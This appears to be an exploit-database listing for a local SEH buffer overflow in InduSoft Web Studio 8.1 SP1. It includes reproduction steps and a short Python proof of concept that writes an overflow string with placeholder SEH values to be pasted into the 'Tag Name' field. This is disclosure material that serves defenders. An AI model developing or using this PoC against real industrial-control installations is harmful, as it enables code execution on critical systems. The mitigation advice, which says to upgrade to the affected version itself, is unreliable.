header-logo
Suggest Exploit
vendor:
InduSoft Web Studio
by:
Luis Martinez
7.8
CVSS
HIGH
Local Buffer Overflow (SEH Unicode)
119
CWE
Product Name: InduSoft Web Studio
Affected Version From: 8.1 SP1
Affected Version To: 8.1 SP1
Patch Exists: YES
Related CWE: N/A
CPE: a:indusoft:indusoft_web_studio:8.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro x64 en
2018

InduSoft Web Studio 8.1 SP1 – ‘Tag Name’ Buffer Overflow (SEH)

InduSoft Web Studio 8.1 SP1 is vulnerable to a local buffer overflow (SEH Unicode) when a specially crafted 'Tag Name' is pasted into the application. This can be exploited by an attacker to execute arbitrary code on the target system.

Mitigation:

Upgrade to the latest version of InduSoft Web Studio 8.1 SP1.
Source

Exploit-DB raw data:

# Exploit Title: InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)
# Discovery by: Luis Martinez
# Discovery Date: 2018-09-11
# Vendor Homepage: http://www.indusoft.com/
# Software Link: http://www.indusoft.com/Products-Downloads
# Tested Version: 8.1 SP1
# Vulnerability Type: Local Buffer Overflow (SEH Unicode)
# Tested on OS: Windows 10 Pro x64 en
 
# Steps to Produce the Local Buffer Overflow (SEH Unicode): 
# 1.- Run python code: InduSoft_Web_Studio_8.1.py
# 2.- Open InduSoft_Web_Studio_8.1.txt and copy content to clipboard
# 3.- Open IWS v8.1 InduSoft Web Studio
# 4.- Home
# 5.- Paste ClipBoard on "Tag Name"
 
#!/usr/bin/env python

nSEH = "\x42\x42"
SEH = "\x43\x43"
 
buffer = "\x41" * 1042 + nSEH + SEH
f = open ("InduSoft_Web_Studio_8.1.txt", "w")
f.write(buffer)
f.close()